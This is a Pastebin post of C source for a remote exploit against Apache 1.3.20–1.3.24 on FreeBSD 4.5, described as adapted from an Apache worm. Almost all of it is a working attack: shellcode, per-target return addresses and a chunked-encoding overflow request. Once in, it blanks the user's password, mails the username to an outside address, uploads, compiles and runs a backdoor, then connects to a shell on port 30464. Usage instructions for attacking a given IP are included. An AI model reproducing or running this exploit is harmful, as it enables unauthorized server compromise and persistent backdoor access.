Advertisement
FlyFar

Worm.FreeBSD.Block - Source Code

Jul 8th, 2023
529
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 9.25 KB | Cybersecurity | 0 0
  1. /**************************************************************************
  2.  
  3. Freebsd apache exploit inspirated to me by apache-worm.c
  4. published on http://packetstormsecurity.nl.Here is how it
  5. works:
  6. 1)Get blackhole.c from packetstorm and set it on port 30464.
  7.  Just change it's default port from the source.
  8. 2) Copy it in /tmp/.blackhole.c
  9.  
  10.  cp blackhole.c /tmp/.blackhole.c
  11.  
  12. 3) Check this source,compile it and run it ./apache-ex <Ip>
  13. If everything works fine you will be connected to a shell on 30464,
  14. then use another exploit to get root.
  15.  
  16. If you have any flames and comment send them to me at <nebunu@home.ro>
  17. Also check the worm source too.
  18.  
  19. **************************************************************************/
  20.  
  21.  
  22. #include <stdio.h>
  23. #include <unistd.h>
  24. #include <string.h>
  25. #include <fcntl.h>
  26. #include <stdlib.h>
  27. #include <stdarg.h>
  28. #include <sys/ioctl.h>
  29. #include <sys/types.h>
  30. #include <sys/socket.h>
  31. #include <netinet/in.h>
  32. #include <sys/time.h>
  33. #include <unistd.h>
  34. #include <errno.h>
  35. #include <netdb.h>
  36. #include <arpa/telnet.h>
  37. #include <rpc/rpc.h>
  38. #include <sys/wait.h>
  39. #include <signal.h>
  40.  
  41. int pizda;
  42. #define ASUCCESS         0
  43. #define HOST_PARAM  "Unknown"
  44. #define RET_ADDR_INC    512
  45. #define PADSIZE_1   4
  46. #define PADSIZE_2   5
  47. #define PADSIZE_3   7
  48. #define REP_POPULATOR   24
  49. #define REP_SHELLCODE   24
  50. #define NOPCOUNT    1024
  51. #undef NOP
  52. #define NOP     0x41
  53. #define PADDING_1   'A'
  54. #define PADDING_2   'B'
  55. #define PADDING_3   'C'
  56. #define PUT_STRING(s)   memcpy(p, s, strlen(s)); p += strlen(s);
  57. #define PUT_BYTES(n, b) memset(p, b, n); p += n;
  58. char shellcode[] =
  59.   "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50\x50\xc6\x04\x24"
  60.   "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1\x18\xd1\xea\x31"
  61.   "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24\x04\x80\x7c\x24"
  62.   "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44\x24\x04\x20\x89"
  63.   "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89\x44\x24\x14\x89"
  64.   "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0\xb0\x5d\xcd\x80"
  65.   "\x31\xc9\xd1\x2c\x24\x73\x27\x31\xc0\x50\x50\x50\x50\xff\x04\x24"
  66.   "\x54\xff\x04\x24\xff\x04\x24\xff\x04\x24\xff\x04\x24\x51\x50\xb0"
  67.   "\x1d\xcd\x80\x58\x58\x58\x58\x58\x3c\x4f\x74\x0b\x58\x58\x41\x80"
  68.   "\xf9\x20\x75\xce\xeb\xbd\x90\x31\xc0\x50\x51\x50\x31\xc0\xb0\x5a"
  69.   "\xcd\x80\xff\x44\x24\x08\x80\x7c\x24\x08\x03\x75\xef\x31\xc0\x50"
  70.   "\xc6\x04\x24\x0b\x80\x34\x24\x01\x68\x42\x4c\x45\x2a\x68\x2a\x47"
  71.   "\x4f\x42\x89\xe3\xb0\x09\x50\x53\xb0\x01\x50\x50\xb0\x04\xcd\x80"
  72.   "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
  73.   "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc";
  74. ;
  75.  
  76. struct {
  77. char *type;
  78. int delta;
  79. u_long retaddr;
  80. int repretaddr;
  81. int repzero;
  82. } targets[] = {
  83.         { "FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)",      -146,  0xbfbfde00,6, 36 },
  84.         { "FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)",   -134,  0xbfbfdb00,3, 36 },
  85. }, victim;
  86.  
  87.  
  88.  
  89. int conectare(char *ip, int port)
  90. {
  91. struct sockaddr_in addr;
  92. int pizda;
  93. pizda = socket(AF_INET, SOCK_STREAM, 0);
  94. if(pizda == -1)
  95. {
  96. perror("socket()");
  97. exit(-1);
  98. }
  99. addr.sin_addr.s_addr = inet_addr(ip);
  100. addr.sin_family = AF_INET;
  101. addr.sin_port = htons(port);
  102. if(connect(pizda,(struct sockaddr *)&addr,sizeof(struct sockaddr_in)) == -1)
  103. return -1;
  104. return(pizda);
  105. }
  106.  
  107.  
  108.  
  109. void pulamea(int pizda)
  110. {
  111. int             n;
  112. char            recvbuf[1024], *cmd = "id; uname -a\n";
  113. fd_set          rset;
  114. send(pizda, cmd, strlen(cmd), 0);
  115. while (1)
  116. {
  117. FD_ZERO(&rset);
  118. FD_SET(pizda, &rset);
  119. FD_SET(STDIN_FILENO, &rset);
  120. select(pizda+1, &rset, NULL, NULL, NULL);
  121. if(FD_ISSET(pizda, &rset))
  122. {
  123. n = read(pizda, recvbuf, 1024);
  124. if (n <= 0)
  125. {
  126. printf("Connection closed by foreign host!\n");
  127. exit(0);
  128. }
  129. recvbuf[n] = 0;
  130. printf("%s", recvbuf);
  131. }
  132. if (FD_ISSET(STDIN_FILENO, &rset))
  133. {
  134. n = read(STDIN_FILENO, recvbuf, 1024);
  135. if (n > 0)
  136. {
  137. recvbuf[n] = 0;
  138. write(pizda, recvbuf, n);
  139. }
  140. }
  141. }
  142. return;
  143. }
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151. void cleanup(char *buf)
  152. {
  153. while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0;
  154. while(*buf == '\n' || *buf == '\r' || *buf == ' ') {
  155. unsigned long i;
  156. for (i=strlen(buf)+1;i>0;i++) buf[i-1]=buf[i];
  157. }
  158. }
  159.  
  160.  
  161. char *GetAddress(char *ip) {
  162. struct sockaddr_in sin;
  163. fd_set fds;
  164. int n,d,sock;
  165. char buf[1024];
  166. struct timeval tv;
  167. sock = socket(PF_INET, SOCK_STREAM, 0);
  168. sin.sin_family = PF_INET;
  169. sin.sin_addr.s_addr = inet_addr(ip);
  170. sin.sin_port = htons(80);
  171. if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) return NULL;
  172. write(sock,"GET / HTTP/1.1\r\n\r\n",strlen("GET / HTTP/1.1\r\n\r\n"));
  173. tv.tv_sec = 15;
  174. tv.tv_usec = 0;
  175. FD_ZERO(&fds);
  176. FD_SET(sock, &fds);
  177. memset(buf, 0, sizeof(buf));
  178. if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
  179. if(FD_ISSET(sock, &fds))
  180. {
  181. if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
  182. for (d=0;d<n;d++) if (!strncmp(buf+d,"Server: ",strlen("Server: "))) {
  183. char *start=buf+d+strlen("Server: ");
  184. for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
  185. cleanup(start);
  186. return strdup(start);
  187. }
  188. }
  189. }
  190. return NULL;
  191. }
  192.  
  193. #define ENC(c) ((c) ? ((c) & 077) + ' ': '`')
  194.  
  195. int sendch(int sock,int buf) {
  196. char a[2];
  197. int b=1;
  198. if (buf == '`' || buf == '\\' || buf == '$') {
  199. a[0]='\\';
  200. a[1]=0;
  201. b=write(sock,a,1);
  202. }
  203. if (b <= 0) return b;
  204. a[0]=buf;
  205. a[1]=0;
  206. return write(sock,a,1);
  207. }
  208.  
  209. int writem(int sock, char *str) {
  210. return write(sock,str,strlen(str));
  211. }
  212.  
  213. int encode(int a) {
  214. register int ch, n;
  215. register char *p;
  216. char buf[80];
  217. FILE *in;
  218. if ((in=fopen("/tmp/.blackhole.c","r")) == NULL) return 0;
  219. writem(a,"begin 655 .blackhole.c\n");
  220. while ((n = fread(buf, 1, 45, in))) {
  221. ch = ENC(n);
  222. if (sendch(a,ch) <= ASUCCESS) break;
  223. for (p = buf; n > 0; n -= 3, p += 3) {
  224. if (n < 3)
  225. {
  226. p[2] = '\0';
  227. if (n < 2) p[1] = '\0';
  228. }
  229. ch = *p >> 2;
  230. ch = ENC(ch);
  231. if (sendch(a,ch) <= ASUCCESS) break;
  232. ch = ((*p << 4) & 060) | ((p[1] >> 4) & 017);
  233. ch = ENC(ch);
  234. if (sendch(a,ch) <= ASUCCESS) break;
  235. ch = ((p[1] << 2) & 074) | ((p[2] >> 6) & 03);
  236. ch = ENC(ch);
  237. if (sendch(a,ch) <= ASUCCESS) break;
  238. ch = p[2] & 077;
  239. ch = ENC(ch);
  240. if (sendch(a,ch) <= ASUCCESS) break;
  241. }
  242. ch='\n';
  243. if (sendch(a,ch) <= ASUCCESS) break;
  244. usleep(10);
  245. }
  246. if (ferror(in)) {
  247. fclose(in);
  248. return 0;
  249. }
  250. ch = ENC('\0');
  251. sendch(a,ch);
  252. ch = '\n';
  253. sendch(a,ch);
  254. writem(a,"end\n");
  255. if (in) fclose(in);
  256. return 1;
  257. }
  258.  
  259. void exploit(char *ip) {
  260. char *a=GetAddress(ip);
  261. int l,sock;
  262. struct sockaddr_in sin;
  263. if (a == NULL) exit(0);
  264. if (strncmp(a,"Apache",6)) exit(0);
  265. free(a);
  266. alarm(60);
  267. for (l=0;l<2;l++) {
  268. u_char buf[512], *expbuf=0, *p=0;
  269. int i=0, j=0, responses=0;
  270. memcpy(&victim, &targets[l], sizeof(victim));
  271. sock = socket(PF_INET, SOCK_STREAM, 0);
  272. sin.sin_family = PF_INET;
  273. sin.sin_addr.s_addr = inet_addr(ip);
  274. sin.sin_port = htons(80);
  275. if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) exit(1);
  276. p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero + 1024) * REP_POPULATOR));
  277. PUT_STRING("POST / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n");
  278. for (i = 0; i < REP_SHELLCODE; i++) {
  279. PUT_STRING("X-");
  280. PUT_BYTES(PADSIZE_3, PADDING_3);
  281. PUT_STRING(": ");
  282. PUT_BYTES(NOPCOUNT, NOP);
  283. memcpy(p, shellcode, sizeof(shellcode) - 1);
  284. p += sizeof(shellcode) - 1;
  285. PUT_STRING("\r\n");
  286. }
  287. for (i = 0; i < REP_POPULATOR; i++) {
  288. PUT_STRING("X-");
  289. PUT_BYTES(PADSIZE_1, PADDING_1);
  290. PUT_STRING(": ");
  291. for (j = 0; j < victim.repretaddr; j++) {
  292. *p++ = victim.retaddr & 0xff;
  293. *p++ = (victim.retaddr >> 8) & 0xff;
  294. *p++ = (victim.retaddr >> 16) & 0xff;
  295. *p++ = (victim.retaddr >> 24) & 0xff;
  296. }
  297. PUT_BYTES(victim.repzero, 0);
  298. PUT_STRING("\r\n");
  299. }
  300. PUT_STRING("Transfer-Encoding: chunked\r\n");
  301. snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2);
  302. PUT_STRING(buf);
  303. PUT_BYTES(PADSIZE_2, PADDING_2);
  304. snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta);
  305. PUT_STRING(buf);
  306. write(sock, expbuf, p - expbuf);
  307. responses = 0;
  308. while (1) {
  309. fd_set fds;
  310. int n;
  311. struct timeval  tv;
  312. tv.tv_sec = 15;
  313. tv.tv_usec = 0;
  314. FD_ZERO(&fds);
  315. FD_SET(sock, &fds);
  316. memset(buf, 0, sizeof(buf));
  317. if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) if(FD_ISSET(sock, &fds)) {
  318. if((n = read(sock, buf, sizeof(buf) - 1)) < 0) break;
  319. if(n >= 1)
  320. {
  321. for(i = 0; i < n; i ++) if(buf[i] == 'G') responses ++; else responses = 0;
  322. if(responses >= 2) {
  323. write(sock,"O",1);
  324. alarm(3600);
  325. sleep(10);
  326. writem(sock,"\npasswd -d `whoami`;echo `whoami` | mail email@youraddress.com\n");
  327. writem(sock,"\nrm -rf /tmp/.blackhole.c;cat > /tmp/.uublackhole << __eof__;\n");
  328. encode(sock);
  329. writem(sock,"__eof__\n");
  330. sprintf(buf,"/usr/bin/uudecode -o /tmp/.blackhole.c /tmp/.uublackhole;gcc -o /tmp/.blackhole /tmp/.blackhole.c;chmod +x /tmp/.blackhole;/tmp/.blackhole;exit;\n");
  331. writem(sock,buf);
  332. while(read(sock,buf,1024)>=0);
  333. exit(0);
  334. }
  335. }
  336. }
  337. }
  338. free(expbuf);
  339. close(sock);
  340. }
  341. return;
  342. }
  343.  
  344.  
  345. main(int argc,char **argv[])
  346.  
  347. {
  348. if (argc!=2)
  349. {
  350. printf("AVAILABLE TARGETS:\n
  351. 1)   FreeBSD 4.5 x86 / Apache/1.3.20 (Unix)      
  352. 2)   FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)
  353.  
  354.  
  355.  Adapted after a apache worm by
  356.  nebunu <nebunu@home.ro>
  357.  
  358.  Usage: ./apache-ex <IP>
  359. \n\n");
  360. exit(0);
  361. }
  362. printf("Exploiting %s , nebunu rulez!\n..",argv[1]);
  363. exploit(argv[1]);
  364. sleep(3);
  365. printf("Connecting to shell on port 30464\n...");
  366. pizda=conectare(argv[1],30464);
  367. pulamea(pizda);
  368. }
Tags: freebsd worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement